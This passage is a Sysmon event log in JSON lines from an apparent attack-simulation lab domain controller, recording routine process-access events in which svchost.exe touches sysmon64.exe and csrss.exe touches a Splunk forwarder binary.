{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3412,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.219\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF5-5F25-0000-0010A2710500}\r\nTargetProcessId: 2008\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.219","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF5-5F25-0000-0010A2710500}","TargetProcessId":"2008","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3413,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.219\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.219","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3414,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.219\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.219","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3415,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.219\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.219","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3416,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.219\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.219","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3417,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.219\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.219","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3418,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.219\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.219","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3419,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.219\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.219","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3420,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.219\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 